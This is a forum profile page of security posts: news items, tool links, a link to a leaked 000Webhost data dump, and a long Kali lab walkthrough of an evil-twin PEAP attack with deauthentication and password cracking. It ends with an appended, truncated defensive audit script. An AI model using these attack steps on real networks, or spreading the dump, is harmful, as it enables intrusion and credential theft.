Everything posted by Nytro
-
Small toolkit for easy creation and usage of various Python scripts that work with embedded devices.
- core - contains most of the toolkit's basic functions
- databases - contains databases, like default credentials etc.
- interface - contains the code used for creating and manipulating the interface
- modules - contains the structure of modules that can be loaded; every module contains vendor-specific sub-modules where scripts are stored:
  - decryptors
  - exploits
  - harvesters
  - misc
  - scanners
- output - output goes here
This is still heavy work-in-progress.
Link: https://github.com/j91321/rext
-
Flaws found in LastPass password manager by security researchers
David Bisson, November 17, 2015, 9:30 pm

Two security researchers have discovered a number of bugs, bad practices, and design issues in the popular LastPass password manager. Martin Vigo and Alberto Garcia Illera, both security engineers at Salesforce.com, recently presented their analysis of LastPass at Black Hat Europe 2015.

In a blog post describing their findings, Vigo and Garcia say that after conducting some preliminary research, the duo decided to see if they could attack LastPass's password vault directly and obtain access to LastPass credentials via three different techniques: client-side attacks, LastPass-side attacks, and attacks from the outside.

Regarding the first method of attack, the researchers found a way to exploit session cookies, allowing them to gain access to the encrypted vault key. "We can use the session cookie to query LastPass and obtain the pwdeckey value," the duo explained. "Once we have that, we can derive a key by doing SHA256(pwdeckey). Now we just need to extract the encrypted vault key from the SQLite DB and decrypt it using the key we just derived."

After unearthing some weaknesses in the way LastPass configured its two-factor authentication protocols, Vigo and Garcia eventually found a way to recover a disabled One Time Password (known as a dOTP, which the researchers describe as a "master password on steroids") that is stored locally on a user's machine. "This is key to understand the advantage of this attack versus stealing the master password, which needs the victim to have previously clicked 'Remember Password'," the researchers note. The duo finally used the dOTP to obtain the session cookie and the encrypted vault key, which they decrypted using the dOTP.

Moving on to LastPass-side attacks, Vigo and Garcia found that the vault itself was not encrypted per se but instead presented cleartext metadata with encrypted values. (The URLs/icons were only encoded, whereas credentials were encrypted using a weak method.) They also found that LastPass added a "custom_js" parameter to every Account node: "Javascript code that will be injected and run in every page load in the domain's context. While this is a legitimate feature, it gives LastPass the possibility of stealing all your credentials."

For outside attacks, the researchers do not go into too much detail in the blog post, and instead direct readers to view the slides of their talk.

At first glance, these bugs in LastPass might seem to endorse the actions of those who - against the advice of some - immediately decided to migrate away from LastPass after the company was bought by LogMeIn. But, as Vigo and Garcia note, LastPass may not be the only password manager with vulnerabilities, and its development team has at least responded to the findings in what seems to be a responsible and timely manner:

We found a number of bugs, bad practices and design issues and used them to obtain the vault key and decrypt all passwords in different scenarios. There is no bug-free software and any future research on other password managers would likely have similar results. LastPass has responded and fixed most of the issues in less than 72 hours.

"We want to point out that the security team at LastPass responded very quickly to all our reports and a lot of the issues were fixed in just a couple of days," the pair explain. "It was very easy to communicate and work with them."

Password managers can have their weaknesses, but as pointed out by Bob Covello on Tripwire's The State of Security blog, even faulty password managers are a good choice versus users storing their passwords in local files. LastPass has taken responsibility for its bugs; it stands to reason that many of these issues will therefore not resurface going forward.

Source: https://grahamcluley.com/2015/11/flaws-lastpass-password-manager-security-researchers/
-
Researcher Demonstrates Simple BitLocker Bypass
By SecurityWeek News on November 18, 2015

BitLocker, the disk encryption solution implemented in the Windows operating system starting with Windows Vista, does not require sophisticated tools or exploits to be bypassed on systems that do not have the latest patches from Microsoft installed, security researcher Ian Haken claims.

With the help of BitLocker, users can lock their entire computer with full-disk encryption, thus ensuring that an attacker cannot access data. BitLocker is available on professional and enterprise versions of Windows and was also designed to protect the pre-boot process from modification using the Trusted Platform Module (TPM), which is also used to safely store its secret key for the full-disk encryption. A TPM is a hardware chip designed to perform cryptographic operations and to store secrets, and its use enables BitLocker to decrypt the operating system partition on boot without requiring pre-boot authentication. However, there is the option to require pre-boot authentication, meaning that the user has to supply a PIN or insert a USB key containing a saved secret key.

One of the Security Support Providers (SSPs) in Windows is Kerberos, and Ian Haken, a researcher at security firm Synopsys, discovered a vulnerability that could allow an attacker to bypass Kerberos authentication and decrypt drives encrypted with BitLocker. For the exploit to be successful, however, BitLocker on the target system has to be enabled without a PIN or USB key (pre-boot authentication), the machine should be domain-joined, and the attacker needs physical access to it.

To bypass authentication, Haken explained that the attacker needs to set up a Kerberos Key Distribution Center (KDC), needs control of the network communication and needs to direct communication to the attacker-controlled "mock" domain controller.

By connecting the machine to the mock domain controller (DC), the attacker can trigger a password reset action, thus gaining access to the encrypted drives. According to the researcher, in this scenario the attacker does not know the user password or the machine password, although they control both the Windows login screen and the mock DC account database where they will be setting a new user password. To be successful, the attacker needs to trigger the Kerberos password change protocol by setting the mock DC to inform the workstation that the user password has expired. According to Haken, the DC does not have to provide authentication, and the workstation prompts the user for a new password, thus allowing the attacker to initiate the exchange. Since the new password is not present on the DC, the login attempt will fail, but the attacker gains access to the machine by disabling network communication, which results in the workstation reverting to local account credentials, now known to the attacker.

"This attack is 100% reliable on affected systems, is not sophisticated (no custom tool was developed, no patches to Samba were necessary, and it was executed with just a few shell commands), and can be executed in a matter of seconds. Configuring Samba manually, this can be done in under a minute. If a tool was written to respond automatically based on DNS/Kerberos requests (thus automatically determining the domain/realm and the username), this could be used to bypass the login screen in a matter of seconds," the researcher explained.

Microsoft resolved the vulnerability in last week's set of patches (Patch Tuesday) by adding an additional authentication check, and claims that it was unaware of any attack attempting to exploit this bypass at the time the fix was released. The issue was found to affect all Windows versions from Windows Vista Service Pack 2 onwards, except for Windows RT and Windows RT 8.1, the company explains in a security bulletin.

Source: Researcher Demonstrates Simple BitLocker Bypass | SecurityWeek.Com
-
Introduction to Windows shellcode development – Part 1
Nytro replied to Nytro's topic in Proiecte RST
Thanks. Technically speaking, it doesn't contain anything. In practice, part II doesn't cover "shellcodes" either, but in part III, I hope, many will be able to understand how they are written.
-
Introduction to Windows shellcode development – Part 1
October 30, 2015, Ionut Popescu

This article contains an overview of shellcode development techniques and their specific aspects. Understanding these concepts allows you to write your own shellcode. Furthermore, you could modify existing exploits that contain already-made shellcode to perform the custom functionality that you need.

Introduction

Let's say you have a working exploit in Internet Explorer or Flash Player that opens calc.exe. This isn't really useful, is it? What you really want is to execute some remote commands or to do other useful functionality. In this situation you may want to use standard existing shellcode, such as the ones from the Shell Storm database or generated by Metasploit's msfvenom tool. However, you must first understand the basic principles of shellcoding so you can use them effectively in your exploits.

Article: http://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1/
-
Link: Offer: we're giving everything away, 13 November - DOMO.ro
Info: Domo will close all its stores - sources - IT - HotNews.ro
Edit: It's nothing special.
-
000Webhost Data Dump https://000webhost.thecthulhu.com/
-
Ashampoo Burning Studio 2016 (Nero alternative) – FREE license
By Radu FaraVirusi(com) on November 15, 2015

Ashampoo Burning Studio 2016 is an excellent program for burning CD\DVD\Blu-Ray discs. It is also a good replacement for the classic Nero Burning ROM, which has a few disadvantages, among them: it is NOT free and it comes with a lot of useless programs that get installed alongside the main program, taking up space and resources. Now you can get this software completely FREE. The program normally costs $50 and offers many features (the new ones in the 2016 version are underlined):
- High DPI aware
- Support for the OPE audio format
- Support for the APE audio format
- Quick access to functions via the jump list (Windows 7 and later)
- Permanent archiving with M-DISC technology
- Better integration with Windows 10, with support for notifications
- create Data CD\DVD\Blu-Ray discs
- Backup\Restore function
- create DVD-Video, Video CD and Super Video CD
- copy CD\DVD\Blu-Ray
- burn and create .iso, .cue\bin and ashdisc images
- create Audio and MP3 CDs, plus ripping
- Create and print labels and covers for your discs

Here is how to get the FREE license:
Go to the site below to obtain the registration code:
https://www.ashampoo.com/frontend/registration/php/trial_step1.php?session_langid=2&edition_id=lhm40nql56aiecrchpy5oudw1tszrby0&ref=linktarget
Download the product from here:
https://cdn2.ashampoo.net/public/ashglob/4610/ashampoo_burning_studio_2016_21653.exe

Via: http://www.faravirusi.com/2015/11/15/ashampoo-burning-studio-2016-alternativa-nero-licenta-gratuita/
-
Wifi Channel Picker
find the best channel for your Wifi router

Wifi Channel Picker enables you to analyze your Wifi connection and find out which channel will have the least amount of interference from other access points around you. The program can be very useful if your Wifi connection is impacted by interference from other close-by access points, e.g. in an apartment building. When you start Wifi Channel Picker, it will first display a list of all access points that are within reach of your signal. It displays them along with detailed information, including the estimated distance of the access point. You can then select the access point you want to analyze and the program will bring up a short report that suggests the best channel to use for your Wifi access point.
XP/Vista/7/8/10 Portable

Product Details
Publisher: VisionIT
Price: Free
Version: 2.0.2.1
Last updated: Nov 13, 2015
File Size: 104 Kb
Requirements: None

Source: Wifi Channel Picker Freeware - Trusted download and reviews from SnapFiles
-
IT companies in Romania can look for employees on a new recruiting platform dedicated exclusively to the industry
by Raluca Abrihan, 12 November 2015, 16:50

The interactive agency 2Fresh has announced the launch of Digitaljob.ro, a niche recruiting platform dedicated exclusively to the digital and IT industry in Romania, following an investment of 30,000 euros. The platform is aimed at companies and specialists working in online, mobile, software and gaming development, as well as advertising or marketing. At present, companies can post their open positions on Digitaljob.ro for free; starting in the first quarter of 2016, the platform will charge companies a fee for each job placed.

Almost 120 companies have already used the platform's services to find candidates, according to Digitaljob.ro representatives. As for the number of ads published so far, it stands at 200, generating a total of 900 applicants. At the moment, over 100 ads are active on Digitaljob.ro, and most of them, over 59%, are for programmers, followed by designers with 30% of the total, marketers with 7% and management with approximately 4%. Over the next 6 months, the platform's representatives aim to attract more employers and increase the number of active jobs by up to 150%.

The idea of launching a niche platform dedicated to this industry came after several failed attempts by the 2Fresh agency to find suitable employees through the existing recruiting methods, on generalist job platforms and with the help of social media, according to Marius Dascalu, Strategy and Creative Director at 2Fresh.

Source: Firmele IT din Romania isi pot cauta angajati pe o noua platforma de recrutare dedicata exclusiv industriei - Idei - StartupCafe.ro
-
Monday, March 3, 2014
Wireless Pentesting on the Cheap (Kali + TL-WN722N) - WPA-Enterprise - Part II
By Tony Lee

Introduction

In our previous articles we used TP-Link's TL-WN722N and a Kali Virtual Machine (VM) to perform wireless discovery and attacks against a Wired Equivalent Privacy (WEP) network, a WPA Pre-Shared Key (PSK) network, a network hiding its SSID, a MAC filtering network, and our first round of WPA-Enterprise networks (LEAP and EAP-MD5) to showcase the abilities of this inexpensive and flexible setup.

WEP: http://securitysynapse.blogspot.com/2013/12/wireless-pentesting-on-cheap-kali-tl.html
WPA-PSK: SecuritySynapse: Wireless Pentesting on the Cheap (Kali + TL-WN722N) - WPA-PSK
Hidden SSID: SecuritySynapse: Wireless Pentesting on the Cheap (Kali + TL-WN722N) - Hidden SSID
MAC Filtering: http://securitysynapse.blogspot.com/2014/02/wireless-pentesting-on-cheap-kali-MACFiltering.html
WPA-Enterprise Part I: SecuritySynapse: Wireless Pentesting on the Cheap (Kali + TL-WN722N) - WPA-Enterprise - Part I

In this article we will complete our tests by attacking a test WPA-Enterprise network that uses Protected EAP (PEAP).

Figure 1: Our setup

Consult our previous article (WEP) for the following topics, as they are omitted from this article due to similarity:
- Equipment
  - Hardware
  - Software
- Tips and tricks
  - Version of Workstation
  - Screen Resolution
  - Simple Text Editor
- Connecting the USB Device

Outline
- Preparation
- WPA-Enterprise Refresher
- Discovery
- Attack
  - PEAP and EAP-TLS Explained
  - Install the Software
    - freeradius-server-2.1.12
    - freeradius-wpe patch
    - hostapd v2.0
  - Start the RADIUS Server
  - Start the Fake AP
  - Deauthenticate the Client
  - Brute-force the Credentials
    - MSCHAPv2
    - EAP-MD5
  - Connect
- Countermeasures
- Conclusion

Preparation

NetworkManager (included in the default Kali Linux) can cause problems when trying to complete simple tasks such as connecting to wireless networks. To prevent any interference, we will disable it ahead of time.
    root@kali:~# service network-manager stop
    [ ok ] Stopping network connection manager: NetworkManager.

WPA-Enterprise Refresher

We already looked at breaking WEP and WPA-PSK networks in previous articles and mentioned that the danger in using these wireless standards is that there is a shared static key that should be changed every time someone with knowledge of the key leaves the company. After all, you wouldn't want an ex-employee still being able to connect to the network after their departure--would you? This is a security issue in any company that has regular turnover. So what is the alternative? WPA-Enterprise of course!

WPA-Enterprise is ideal for large organizations because it does not use a single shared key that all users use to connect to the wireless network. Each user has their own account (usually a username and password) that they use to authenticate to the network. Best of all, these accounts can be centrally authenticated and managed--even linked into existing account repositories such as Active Directory or LDAP. When an employee leaves the company and their account is terminated in Active Directory, it would also be terminated from the wireless if authentication is passed through.

The other unique WPA-Enterprise attribute is its use of Extensible Authentication Protocols (EAPs). This allows multiple implementations and increased flexibility for corporations. This flexibility is a double-edged sword though, as not all EAP types are created equal (in terms of security or ease of deployment). We discussed LEAP and EAP-MD5 in the previous article. The EAP types we will discuss in this article are bolded below (feel free to skip the non-bolded ones, as they are present for completeness):

- LEAP - Lightweight EAP
  Credentials are sent without SSL tunnel protection, using the MS-CHAP authentication protocol.
  "[P]roprietary wireless LAN authentication method developed by Cisco Systems"
  "LEAP uses a modified version of MS-CHAP, an authentication protocol in which user credentials are not strongly protected."
  "Cisco LEAP, similar to WEP, has had well-known security weaknesses since 2003 involving offline password cracking."
  Source: http://en.wikipedia.org/wiki/Lightweight_Extensible_Authentication_Protocol
- EAP-MD5
  Credentials are sent without SSL protection, but MD5 hashed.
  "It offers minimal security; the MD5 hash function is vulnerable to dictionary attacks, and does not support key generation, which makes it unsuitable for use with dynamic WEP, or WPA/WPA2 enterprise."
  Source: https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol#EAP-MD5
- PEAP - (Protected EAP)
  "[E]ncapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated Transport Layer Security (TLS) tunnel"
  "Jointly developed by Cisco Systems, Microsoft, and RSA Security."
  "Requiring only a server-side PKI certificate to create a secure TLS tunnel to protect user authentication, and uses server-side public key certificates to authenticate the server"
  Source: http://en.wikipedia.org/wiki/Protected_Extensible_Authentication_Protocol
  The most common inner authentication protocols are MSCHAPv2 and GTC (tokens).
- EAP-TLS - (EAP-Transport Layer Security)
  "[U]ses PKI to secure communication to a RADIUS authentication server or another type of authentication server."
  "Though it is rarely deployed, EAP-TLS is still considered one of the most secure EAP standards available and is universally supported by all manufacturers of wireless LAN hardware and software."
  Requires a client-side certificate, which prevents many organizations from using it.
  Source: https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol#EAP-TLS
- EAP-FAST - (Flexible Authentication via Secure Tunneling)
  "[A] protocol proposal by Cisco Systems as a replacement for LEAP."
  "Use of server certificates is optional in EAP-FAST."
  "EAP-FAST uses a Protected Access Credential (PAC) to establish a TLS tunnel in which client credentials are verified."
  "When automatic PAC provisioning is enabled, EAP-FAST has a slight vulnerability where an attacker can intercept the PAC and use that to compromise user credentials."
  Source: https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol#EAP-FAST

Discovery (kismet)

In previous articles, we used iwlist, airodump-ng, and Kismet to discover wireless networks. This is also the case here. Take a look below at the information that iwlist provides.

    root@kali:~# iwlist wlan1 scanning | grep -A 30 CorpNetwork
    ESSID:"CorpNetwork"
    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s
    Mode:Master
    Extra:tsf=000000000d674180
    Extra: Last beacon: 96ms ago
    IE: Unknown: 000B436F72704E6574776F726B
    IE: Unknown: 010482840B16
    IE: Unknown: 030101
    IE: IEEE 802.11i/WPA2 Version 1
    Group Cipher : TKIP
    Pairwise Ciphers (2) : CCMP TKIP
    Authentication Suites (1) : 802.1x
    --snip--

Even though these three tools can identify WPA-Enterprise networks, none of them can tell you the EAP type. For this we use Wireshark to inspect the packets. Let's capture some traffic with airodump-ng and inspect it with Wireshark, but first we want to place the wireless card into "Monitor" mode.

    root@kali:~# airmon-ng start wlan0

We first use airodump-ng without any options in order to discover the network we want to examine and its details. After we obtain this information, we focus our collection efforts by locking onto the channel and AP.
    Syntax: airodump-ng -c <CHANNEL> --bssid <APMAC> -w <FILE PREFIX> <INT>
    Key:
    -c = Channel that the AP is on
    --bssid = MAC address of the AP
    -w = Prefix of the file name that you want to write data to
    <INT> = Interface we will be capturing on
    Attack: airodump-ng --bssid A0:F3:C1:0C:B6:46 -c 1 -w mysteryEAP mon0

Figure 2: airodump-ng is detecting wireless networks

From this screenshot, we will note a few items for the attack later:

    Variable name = Description: Value
    ==============================
    $ESSID = ESSID: CorpNetwork
    $CH = Channel: 1
    $AP = AP MAC: A0:F3:C1:0C:B6:46
    $VM = Victim user MAC: 24:77:03:8C:D3:44

Now that our capture is running, we can inspect the packets with Wireshark. In order to discover the EAP type, we can use Wireshark's "Statistics -> Protocol Hierarchy" feature. Look for 802.1X Authentication and apply a filter to those selected packets. A shortcut would be to type "eapol" in the display filter.

Figure 3: Wireshark Protocol Hierarchy feature

After applying the filter, we see that the EAP type is Protected EAP (PEAP).

Figure 4: EAP type is PEAP

Attack

Now that discovery is complete and we understand the EAP type, we will examine the attack methodology for PEAP and EAP-TLS.

PEAP and EAP-TLS Explained

Since PEAP and EAP-TLS use a secure tunnel to pass the inner authentication protocol, we will need to create a fake RADIUS server and fake access point and convince the client to connect to our infrastructure. This will be accomplished by having a stronger signal than their access point and then deauthenticating the client so they connect to our AP. The diagrams below help to illustrate the attack process. In the first image, we see normal operation of a client connected to the access point and the access point passing the authentication on to the RADIUS server.
Figure 5: Normal operation in which the client is connected to the legitimate network

In the second image, we see a deauth attack followed by the client connecting to the fake access point and an attempt to authenticate to the attacker's RADIUS server.

Figure 6: After the wireless client is deauthenticated, the client will hopefully connect to our fake access point

This should yield the information necessary to begin a brute-force attack on the credentials. Let's look at the detailed steps that are required to get this set up in our environment. Our steps taken with this setup are outlined below:
- Install the Software
- Start the RADIUS Server
- Start the Fake AP
- Deauthenticate the Client
- Brute-force the Credentials

Install the Software

This attack requires a decent amount of software that is not installed by default on the Kali Linux attack image. The software we need is:
- freeradius-server-2.1.12
- freeradius-wpe (Wireless Pwnage Edition) patch
- hostapd v2.0

We have greatly simplified the download and install of the RADIUS attack service by listing the commands needed below. The freeradius-server-2.1.12 and the patch can be downloaded and applied by copying and pasting the following commands into a terminal as root:

    wget ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.12.tar.bz2
    wget https://raw.github.com/brad-anton/freeradius-wpe/master/freeradius-wpe.patch
    tar -jxvf freeradius-server-2.1.12.tar.bz2
    cd freeradius-server-2.1.12
    patch -p1 < ../freeradius-wpe.patch
    ./configure
    make
    make install
    ldconfig

Explanation of the commands above: The first two wget statements download both the freeradius server and the patch for wpe. The next line decompresses the freeradius-server package. Then we change directories into the decompressed directory and run the patch. Then we compile and install the application.
After running the commands above, test the freeradius server to make sure the patch was applied by running it with the (-v) version option. You should see "FreeRADIUS-WPE" in the banner.

    root@kali:~/freeradius-server-2.1.12# radiusd -v
    radiusd: FreeRADIUS-WPE Version 2.1.12, for host i686-pc-linux-gnu, built on Jul 29 2013 at 10:34:02
    --snip--

The version of hostapd that Kali has in its repositories is 1.X--which has a limitation of only being able to negotiate WPA1. If we want to be able to attack WPA2 networks, we need to install hostapd v2.0 from source. We have simplified the installation and troubleshooting of the hostapd service by listing the commands below for your copy and paste pleasure:

    wget http://hostap.epitest.fi/releases/hostapd-2.0.tar.gz
    tar -zxvf hostapd-2.0.tar.gz
    cd hostapd-2.0/
    cd hostapd/
    cp defconfig .config
    apt-get install libnl-dev
    apt-get update
    apt-get install libssl-dev
    make && make install

Explanation of the commands above: The first command obtains the latest source code for hostapd. The next three commands decompress the package and navigate to the proper directory for compilation. We then create a configuration file for compiling. The next three commands grab the necessary libraries, and finally the last command compiles and installs the binaries.

After all the software is installed, we can start the attack.

Start the RADIUS Server

We can attempt to start the RADIUS server and perform the attack, but there is one configuration change that we needed to make in order to successfully capture credentials from a Windows client using AD pass-through authentication. The file we needed to edit is: /usr/local/etc/raddb/modules/mschap

We had to make sure the line "with_ntdomain_hack" was set to yes and uncommented as shown below:

    # Windows sends us a username in the form of
    # DOMAIN\user, but sends the challenge response
    # based on only the user portion. This hack
    # corrects for that incorrect behavior.
    with_ntdomain_hack = yes

When that line was commented out, we received the following error message: "Could not recover last 2 bytes of hash from the challenge/response."

Figure 7: Error message when "with_ntdomain_hack" was not set to yes

Now that we have the configuration file modified, we should be ready to start radiusd.

    Syntax: radiusd -X
    Key:
    -X = Debugging mode. When trying to understand how the server works, ALWAYS run it with "radiusd -X".

The screenshot below shows the expected behavior of running "radiusd -X". The configuration will flash by and then the screen will hang until there is input from the fake access point that we set up in the next step.

Figure 8: radiusd is ready to process requests

Start the Fake AP

If we want to trick the victim into connecting to our setup, we need a fake access point. This can be a hardware-based access point, such as the Netgear home router we have been using in the previous articles, or we can create a software access point. Because a software access point is more flexible and portable, we will use the hostapd software AP in this article. The hostapd software requires a configuration file.
Feel free to use our example file below to get started:

    interface=wlan0
    driver=nl80211
    ssid=CorpNetwork
    logger_stdout=-1
    logger_stdout_level=0
    dump_file=/tmp/hostapd.dump
    ieee8021x=1
    eapol_key_index_workaround=0
    own_ip_addr=127.0.0.1
    auth_server_addr=127.0.0.1
    auth_server_port=1812
    auth_server_shared_secret=testing123
    wpa=2
    wpa_key_mgmt=WPA-EAP
    channel=1
    wpa_pairwise=TKIP CCMP

After you have entered the data above in a file called hostapd.conf, run the software and supply the configuration file as shown below:

    Syntax: hostapd <configuration file>
    Example: hostapd ./hostapd.conf

After running hostapd, your screen should look like the following screenshot:

Figure 9: hostapd will display minimal output after it is ready to receive the first wireless client

Deauthenticate the Client

Now that we have our RADIUS server and fake access point ready to go, we need a client to authenticate to us. We could be patient and wait for any client to connect or reconnect to our AP, or we could help speed the process up. Our goal here is to deauthenticate (aka kick a client off the network) so they reconnect to the network. Upon client reauthentication, we will trick them into connecting to our fake access point and RADIUS server so they will create the encrypted tunnel with us and pass their inner authentication credentials. In our example, the victim information found during the discovery phase is summarized below:

    Variable name = Description: Value
    ==============================
    $ESSID = ESSID: CorpNetwork
    $CH = Channel: 1
    $AP = AP MAC: A0:F3:C1:0C:B6:46
    $VM = Victim user MAC: 24:77:03:8C:D3:44

Now, let's knock the victim off the wireless network using aireplay's deauthentication attack.
    Syntax: aireplay-ng -0 25 -a <AP> -c <VICTIM_MAC> <INT>
    Key:
    -0 = (same as --deauth) deauthentication attack
    -a = MAC address of the AP
    -c = Victim MAC address
    <INT> = Interface we will be attacking from
    Attack: aireplay-ng -0 25 -a $AP -c $VM mon0

If the client reconnects to your access point, you will see traffic on both the freeradius-wpe screen as well as the hostapd screen. However, the real goods will be displayed in the freeradius-server-wpe.log file:

    root@kali:~# tail -f /usr/local/var/log/radius/freeradius-server-wpe.log

The client authentication will fail, but this still provides us with the MSCHAPv2 challenge/response we need to crack the user's password, shown in the next section.

Figure 10: The user's authentication will fail, but we will have the challenge/response needed to crack the password

Brute-force the Credentials

Since the attack on these WPA-Enterprise inner authentication protocols is an off-line brute-force attack, you will first need a sufficiently large wordlist to supply to the cracking program. The rockyou.com word list is a good start, as it contains almost 14.5 million passwords. In order to use the rockyou.com wordlist, you will have to uncompress it as shown below:

    root@kali:/usr/share/wordlists# ls
    rockyou.txt.gz
    root@kali:/usr/share/wordlists# gunzip rockyou.txt.gz
    root@kali:/usr/share/wordlists# ls
    rockyou.txt
    root@kali:/usr/share/wordlists# wc -l rockyou.txt
    14344392 rockyou.txt

MSCHAPv2

Since the inner authentication protocol was MSCHAPv2 in this example, we will use Josh Wright's asleap tool as shown below. We will supply the challenge (-C), response (-R), and the wordlist (-W):

    Syntax:
    root@kali:~# asleap
    asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
    asleap: Must supply an interface with -i, or a stored file with -r
    Usage: asleap [options]
    -r Read from a libpcap file
    -i Interface to capture on
    -f Dictionary file with NT hashes
    -n Index file for NT hashes
    -s Skip the check to make sure authentication was successful
    -h Output this help information and exit
    -v Print verbose information (more -v for more verbosity)
    -V Print program version and exit
    -C Challenge value in colon-delimited bytes
    -R Response value in colon-delimited bytes
    -W ASCII dictionary file (special purpose)
    Attack:
    root@kali:~# asleap -C 9f:55:58:f3:27:72:12:4e -R 79:bc:55:2e:ef:0d:33:1e:ca:5f:75:93:0d:9e:14:e3:6d:78:9b:f5:61:0a:b8:7b -W /usr/share/wordlists/rockyou.txt

The asleap tool is very fast. It found our password of "cheekymonkeyrox" in just seconds because it is present as-is within the rockyou password list.

Figure 11: The challenge/response is used in the asleap tool with a dictionary to recover the password

Keep in mind that passwords are case sensitive and would thus most likely require permutations of passwords, as discussed in previous articles.
For more complex cracking attempts, it is possible to use John the Ripper (JTR) to perform permutations and make dictionaries larger:

    Generate permutations with JTR:
    /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout

    Feed JTR permutations into asleap:
    /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | asleap -W - -C <CHALLENGE> -R <RESPONSE>

    Example:
    /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | asleap -C 9f:55:58:f3:27:72:12:4e -R 79:bc:55:2e:ef:0d:33:1e:ca:5f:75:93:0d:9e:14:e3:6d:78:9b:f5:61:0a:b8:7b -W -

EAP-MD5

If the inner authentication protocol is EAP-MD5, use the eapmd5pass tool:

    Syntax:
    root@kali:~# eapmd5pass
    eapmd5pass - Dictionary attack against EAP-MD5
    Usage: eapmd5pass [ -i <int> | -r <pcapfile> ] [ -w wordfile ] [options]
      -i <iface>      interface name
      -r <pcapfile>   read from a named libpcap file
      -w <wordfile>   use wordfile for possible passwords.
      -b <bssid>      BSSID of target network (default: all)
      -U <username>   Username of EAP-MD5 user.
      -C <chal>       EAP-MD5 challenge value.
      -R <response>   EAP-MD5 response value.
      -E <eapid>      EAP-MD5 response EAP ID value.
      -v              increase verbosity level (max 3)
      -V              version information
      -h              usage information
    The "-r" and "[-U|-C|-R|-E]" options are not meant to be used together. Use -r when a packet capture is available. Specify the username, challenge and response when available through other means.

    Attack:
    root@kali:~# eapmd5pass -w /usr/share/wordlists/rockyou.txt -r WPAcapture-01.cap

For more complex cracking attempts, it is possible to use John the Ripper (JTR) to perform permutations and make dictionaries larger:

    Generate permutations with JTR:
    /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout

    Feed JTR permutations into eapmd5pass:
    /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | eapmd5pass -w - -r <PCAP>

    Example:
    /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | eapmd5pass -w - -r WPAcapture-01.cap

Connect

Now that we have recovered the credentials, we will connect to the AP using the configuration files below:

    Check the status of the card:
    root@kali:~# iwconfig wlan0

    Enter the network information:
    root@kali:~# iwconfig wlan0 essid "QX3A7"

    Bring the interface up:
    root@kali:~# ifconfig wlan0 up

    Create wpa_supplicant file:
    network={
        ssid="CorpNetwork"
        scan_ssid=1
        key_mgmt=WPA-EAP
        eap=PEAP
        identity="TonyTestUser"
        password="cheekymonkeyrox"
        phase1="peaplabel=0"
        phase2="auth=MSCHAPV2"
    }

    Run the wpa_supplicant:
    root@kali:~# wpa_supplicant -i wlan0 -c ~/wpa-psk.conf

    Obtain an IP:
    root@kali:~# dhclient wlan0
    Reloading /etc/samba/smb.conf: smbd only.

    Verify an IP is obtained:
    root@kali:~# ifconfig wlan0

Countermeasures

Even though the intention of this article is not to warn about the dangers of using WPA-Enterprise PEAP or EAP-TLS security, we feel that it is important to note that client settings can be just as important as the EAP type. That said, we perform many wireless assessments in which we discover misconfigured clients that leave themselves open to the attack outlined in this article. When this is the case, we recommend centrally reconfiguring the wireless clients to reflect a more secure configuration.
For example, PEAP properties should always validate server certificates, specify RADIUS servers, specify CAs, and prevent users from overriding any suspicious events. These secure client settings are shown in the screenshot below.

Figure 12: Wireless client settings for PEAP

Conclusion

In this article, we proved the capabilities of an inexpensive wireless adapter and a flexible virtualized wireless attack image by breaking into a WPA-Enterprise PEAP test network. For just $16 and with no reboot required, you can place a wireless adapter into monitor mode and start assessing wireless networks. More testing needs to be done with this setup to determine other capabilities; however, as of right now, it appears that it can provide quick, portable, flexible, and inexpensive wireless testing. Feedback below is always appreciated. If you try this with different cards and run into issues, check the following excellent resource: http://docs.kali.org/troubleshooting/troubleshooting-wireless-driver-issues

Props

Thomas d'Otreppe for the ever critical aircrack-ng software suite
Josh Wright and Brad Antoniewicz for great work on freeradius-WPE
Josh Wright for asleap and eapmd5pass
Jouni Malinen <j@w1.fi> and contributors for hostapd
Offensive Security group for Kali Linux
Dan Dumond for the sanity check and proof read

Posted by Tony Lee at 3:00 AM

Source: http://securitysynapse.blogspot.ro/2014/03/wireless-pentesting-on-cheap-kali-WPAEntPartII.html
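A small audit script for the client-side countermeasures above, added here as an example and not part of the original article: it parses wpa_supplicant network blocks and flags WPA-EAP networks that, like the article's own wpa_supplicant file, carry no CA certificate and no expected RADIUS server identity. The option names are real wpa_supplicant.conf keys; the certificate path and server name in the hardened block are constructed placeholders.

```python
"""Flag wpa_supplicant EAP networks that skip RADIUS server validation.

Added example, not from the article. It checks the two client settings the
Countermeasures section calls out: validating the server certificate against
a CA, and pinning which server certificate is acceptable. The option names are
real wpa_supplicant.conf keys; the hardened values are placeholders.
"""
import re
from typing import Dict, List

# Either option makes wpa_supplicant validate the server certificate chain.
CERT_OPTIONS = ("ca_cert", "ca_path")
# Any of these restricts which certificate from that CA is accepted as the server.
SERVER_ID_OPTIONS = ("domain_suffix_match", "subject_match", "altsubject_match")

_BLOCK_RE = re.compile(r"network\s*=\s*\{(.*?)\}", re.DOTALL)


def parse_networks(conf: str) -> List[Dict[str, str]]:
    """Return one {option: value} dict per network={...} block, quotes stripped."""
    networks = []
    for body in _BLOCK_RE.findall(conf):
        opts = {}
        for line in body.splitlines():
            line = line.split("#", 1)[0].strip()  # drop comments and whitespace
            if "=" not in line:
                continue
            key, value = line.split("=", 1)
            opts[key.strip()] = value.strip().strip('"')
        networks.append(opts)
    return networks


def audit_network(opts: Dict[str, str]) -> List[str]:
    """Return findings for one network block; an empty list means no issue."""
    if "WPA-EAP" not in opts.get("key_mgmt", "").split():
        return []  # PSK or open network: the PEAP checks do not apply
    ssid = opts.get("ssid", "<no ssid>")
    eap = opts.get("eap", "?")
    findings = []
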